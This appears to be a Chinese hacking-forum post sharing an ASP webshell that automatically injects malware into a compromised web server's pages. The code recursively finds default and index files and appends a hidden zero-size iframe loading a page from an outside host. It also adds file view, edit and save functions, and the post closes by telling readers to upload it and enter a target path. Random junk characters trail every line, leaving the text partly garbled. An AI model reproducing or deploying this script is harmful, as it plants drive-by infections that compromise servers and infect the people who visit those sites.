一个webshell下自动挂马的ASP,挂马的朋友不可错过哦^_^ Y9m'RFZr
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Response.Buffer=False sHe:h XG'
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<**** http-equiv="Content-Type" content="text/html; charset=gb2312"> 3vOI=ar=L~
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<% r3w. $
ASP_SELF=Request.ServerVariables("PATH_INFO") =[`wyQe`_
`NV =2T
s=Request("fd") _3T*[s;H
ex=Request("ex") Xt'R@"H<V9
pth=Request("pth") "G|Gyc
newcnt=Request("newcnt") *ZGQ`#1.X6
If ex<>"" AND pth<>"" Then i,ku91T
select Case ex mn" a$
Case "edit" 7 .+kcqX
CALL file_show(pth) 7%8,*T
Case "save" tF&%7(EU3
CALL file_save(pth) bqf=;N vog
End select 9XS+W
Else YFLWkdqAY
%> iTbmD
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Function IsPattern(patt,str) D2>EG~xWq
Set regEx=New RegExp ~srmlBi6
regEx.Pattern=patt + 7E6U*
regEx.IgnoreCase=True pWps-e
retVal=regEx.Test(str) "6pjkEt4
Set regEx=Nothing \I,<G7!0
If retVal=True Then 6!g3Juh
IsPattern=True ;'tsdsu}
Else >g93Bj*
IsPattern=False )J (ekfM
End If sj. eJX"z
End Function OU9=O>
If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then 5yxZ
sch s |=38t8Ge&
Else o|alL-
If s<>"" Then Response.Write "Invalid Agrument!" Ko''G5+
End If #)>>f
Sub sch(s) G!OD7:
oN eRrOr rEsUmE nExT )KBv[|
Set fs=Server.createObject("Scripting.FileSystemObject") [rPW@|^5
Set fd=fs.GetFolder(s)
Set fi=fd.Files h{<^?=
Set sf=fd.SubFolders 2HQ'iEu$
For Each f in fi \|j`jsq
rtn=f.Path a+weBF#Z
step_all rtn p$ [*GXR4
Next f
If sf.Count<>0 Then 2E2J=Do
For Each l In sf _vU,avw
sch l z0g]nYN%
Next ,Z>Rv Ll
End If z^}T=
End Sub 4ItXZ o
Sub step_all(agr) e>z7?"N
retVal=IsPattern("(\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b",agr) A%+~
If retVal Then 4f"be
step1 agr XJ@ /r,2
step2 agr uVscF
Else Nob(bD5SpE
Exit Sub `$@1NL7>
End If z+-k4
End Sub 7)_0jp~2
%> )[nzmL*w
<%Sub step1(str1)%> *~ &W?i
<a href="<%=ASP_SELF%>?ex=edit&pth=<%=str1%>" target="_blank"><%=str1%></a><br> <o?qpW$,>
<%End Sub%> G|^gaj '9
<% &|{ K*pNa
Sub step2(str2) wEDU*}~
addcode="<iframe src=http://www.21o.net/mm/mm.htm(修改为你的马的地址,不要加""不然会出错) width=0 height=0 frameborder=0></iframe>" oY.JK
Set fs=Server.createObject("Scripting.FileSystemObject") aL=VNZ!Pqc
isExist=fs.FileExists(str2) ;WGY)=-gv
If isExist Then `Rm B{qgB
Set f=fs.GetFile(str2) 9w0 ^=
Set f_addcode=f.OpenAsTextStream(8,-2) P"iqP|
f_addcode.Write addcode bQ
f_addcode.Close O
Set f=Nothing h{PLyWH
End If /pb7
Set fs=Nothing !%@n067
End Sub x!YfZ*
%> Vn8Qsf1f
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Sub file_show(fname) },f7I^s|
Set fs1=Server.createObject("Scripting.FileSystemObject") Y_)04dmr@[
isExist=fs1.FileExists(fname) >eUAHmXQ|
If isExist Then Nz:
Set fcnt=fs1.OpenTextFile(fname) s#qq%
cnt=fcnt.ReadAll d1E~H]X4
fcnt.Close 'Ob5l:
Set fs1=Nothing%> k8*=1kl"
FILE: <%=fname%> C)ChF`Ru':
<form action="<%=ASP_SELF%>" method="POST"> gJF;yW4
<textarea name="newcnt" cols="100" rows="30"><%=cnt%></textarea> f%@Y
<input type="hidden" name="pth" value="<%=fname%>"> +[F9Q,bH@b
<input type="hidden" name="ex" value="save"> R
<input type="submit" value="SAVE"> vNtbb]')m
</form> YK[O#V
<%Else%> sPZa|AKHb
<p>THE FILE IS NOT EXIT OR HAVE deleteD.</p> "?S#vUS+ 2
<% }'X}!_9w>
End If H"&N<"hw
End Sub iySmNI
%> ;hZ(20
<% 9X*q^u
Sub file_save(fname) J J3vC
Set fs2=Server.createObject("Scripting.FileSystemObject") hQet?*diU
Set newf=fs2.createTextFile(fname,True) igo7F@_,
newf.Write newcnt P)}:lTe
newf.Close $@#nn5^IX
Set fs2=Nothing oNEU?+
Response.Write "<p>THE FILE WAS MODIFIED SUCCESSFULLY.</p>" E=x\f "Z
End Sub ]kKsGch
%> 1zp,Suv
</body> OVivJx
</html> bC@b9opD
传进服务器以后 直接输入需要挂马的路径就可以直接挂了